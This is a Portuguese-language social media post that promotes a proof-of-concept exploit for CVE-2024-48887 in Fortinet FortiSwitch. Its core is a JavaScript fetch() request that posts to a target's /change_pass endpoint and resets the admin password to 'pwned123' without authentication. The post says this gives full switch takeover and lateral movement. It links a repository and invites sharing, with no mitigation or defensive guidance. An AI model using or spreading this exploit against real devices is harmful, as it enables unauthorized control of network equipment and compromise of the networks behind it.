
um snippet JavaScript leve que demonstra como alterações não autorizadas de senha podem ser acionadas em endpoints GUI vulneráveis do Fortinet FortiSwitch.
🚨 FortiSwitch CVE-2024-48887 PoC (JavaScript) 🚨
🔥 Acabei de publicar um snippet JavaScript leve mostrando como alterações de senha não autorizadas podem ser acionadas em endpoints GUI vulneráveis do Fortinet FortiSwitch.
🛠️ Sobre a Vulnerabilidade: Um atacante pode criar uma simples requisição fetch() para manipular configurações de senha sem nenhuma autenticação, mirando diretamente variantes do endpoint /change_pass.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 Impacto: Assunção total do switch, potencial de movimento lateral e comprometimento da rede.
📁 Repositório: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ Dê uma estrela no repositório e compartilhe com seu pessoal de infosec!
📢 Acompanhe a análise completa e alertas em tempo real via @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground